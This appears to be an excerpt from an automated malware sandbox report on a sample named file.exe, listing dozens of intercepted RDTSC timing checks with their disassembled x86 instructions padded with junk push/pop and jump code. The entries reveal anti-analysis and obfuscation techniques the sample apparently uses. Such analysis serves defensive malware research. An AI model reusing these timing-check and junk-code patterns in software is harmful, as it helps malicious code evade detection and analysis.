                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CCB5 second address: 133CD2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC850CE3D3Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop edx 0x00000012 nop 0x00000013 mov ebx, dword ptr [ebp+12481CFBh] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FC850CE3D38h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 adc edx, 5DCB1D17h 0x00000039 mov dh, bh 0x0000003b add eax, ebx 0x0000003d mov dword ptr [ebp+122D1F71h], ebx 0x00000043 nop 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FC850CE3D49h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CD2A second address: 133CD40 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c je 00007FC8515781E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133CD40 second address: 133CD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13980B4 second address: 13980CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007FC8515781D8h 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A156A second address: 13A15A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC850CE3D36h 0x0000000a pop ecx 0x0000000b jmp 00007FC850CE3D49h 0x00000010 pop ecx 0x00000011 pushad 0x00000012 pushad 0x00000013 js 00007FC850CE3D36h 0x00000019 js 00007FC850CE3D36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A15A2 second address: 13A15BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A15BC second address: 13A15C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F539 second address: 139F564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E7h 0x00000009 jmp 00007FC8515781DEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F806 second address: 139F80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139FD0C second address: 139FD12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0300 second address: 13A030A instructions: 0x00000000 rdtsc 0x00000002 js 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A05C8 second address: 13A0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8515781E1h 0x00000009 pop edi 0x0000000a jnl 00007FC8515781EAh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0604 second address: 13A0629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D36h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC850CE3D40h 0x00000011 popad 0x00000012 jne 00007FC850CE3D38h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A0BF5 second address: 13A0C07 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC8515781DCh 0x00000008 jnl 00007FC8515781D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A1228 second address: 13A1238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FC850CE3D36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A1238 second address: 13A123D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A123D second address: 13A125E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A125E second address: 13A1264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A1264 second address: 13A1294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC850CE3D49h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FC850CE3D3Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A615A second address: 13A6160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9791 second address: 13A97C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D36h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC850CE3D3Ah 0x00000011 popad 0x00000012 jbe 00007FC850CE3D40h 0x00000018 jmp 00007FC850CE3D3Ah 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC850CE3D3Ah 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97C9 second address: 13A97CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97CD second address: 13A97E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A97E8 second address: 13A9803 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC8515781D6h 0x00000008 jmp 00007FC8515781E1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9803 second address: 13A9809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C47 second address: 13A9C55 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC8515781D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9C55 second address: 13A9C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC850CE3D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AC6 second address: 13B3ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3ACC second address: 13B3AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC850CE3D36h 0x0000000a jmp 00007FC850CE3D48h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AEF second address: 13B3AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AF5 second address: 13B3AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3AF9 second address: 13B3AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21B8 second address: 13B21BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21BE second address: 13B21E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E0h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007FC8515781D6h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21E0 second address: 13B21FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC850CE3D46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B21FB second address: 13B2213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FC8515781DBh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2213 second address: 13B222D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC850CE3D36h 0x00000008 jmp 00007FC850CE3D40h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B222D second address: 13B2233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B239C second address: 13B23A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC850CE3D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B23A6 second address: 13B23C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007FC8515781D6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC8515781DBh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B23C5 second address: 13B23C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B27D6 second address: 13B27E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B27E5 second address: 13B27F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC850CE3D36h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B3966 second address: 13B396A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B396A second address: 13B3970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BACF9 second address: 13BACFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE51 second address: 13BAE57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE57 second address: 13BAE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE5C second address: 13BAE64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE64 second address: 13BAE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE68 second address: 13BAE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE6C second address: 13BAE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BAE79 second address: 13BAE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD635 second address: 13BD63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD63B second address: 13BD63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD63F second address: 13BD645 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD4E2 second address: 13BD4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC850CE3D38h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD96F second address: 13CD973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD973 second address: 13CD984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC850CE3D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD984 second address: 13CD98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD98A second address: 13CD990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD990 second address: 13CD9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b jo 00007FC8515781E6h 0x00000011 jmp 00007FC8515781E0h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CD9B1 second address: 13CD9C9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC850CE3D38h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC850CE3D36h 0x00000012 jnp 00007FC850CE3D36h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D3356 second address: 13D335C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D335C second address: 13D3362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC550 second address: 13DC55C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC8515781DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC55C second address: 13DC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC850CE3D47h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FC850CE3D36h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDD84 second address: 13DDD8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDD8C second address: 13DDD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1304152 second address: 1304165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC8515781DEh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DF635 second address: 13DF647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC850CE3D3Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E14F8 second address: 13E150E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8515781E0h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E150E second address: 13E1533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007FC850CE3D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FC850CE3D42h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1533 second address: 13E1537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9FE5 second address: 13E9FF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC850CE3D36h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0791 second address: 13F07A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC8515781D6h 0x0000000a popad 0x0000000b jne 00007FC8515781D8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6E0F second address: 13F6E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6E15 second address: 13F6E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F6E1B second address: 13F6E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84D8 second address: 13F84DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84DE second address: 13F84E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84E4 second address: 13F84F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FC8515781DEh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F84F9 second address: 13F8515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC850CE3D46h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8515 second address: 13F8519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8519 second address: 13F851D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC67D second address: 13FC687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC8515781D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC687 second address: 13FC692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC692 second address: 13FC696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038CE second address: 14038D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC850CE3D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038D8 second address: 14038EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnp 00007FC8515781D6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038EB second address: 14038FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC850CE3D3Ch 0x0000000b jnp 00007FC850CE3D36h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14038FC second address: 140390F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781DEh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005C2 second address: 14005DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC850CE3D44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14005DA second address: 14005DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420EBE second address: 1420EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420EC8 second address: 1420ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141FDA9 second address: 141FDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14205E9 second address: 1420614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8515781E6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC8515781DDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420614 second address: 1420618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1420618 second address: 142061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
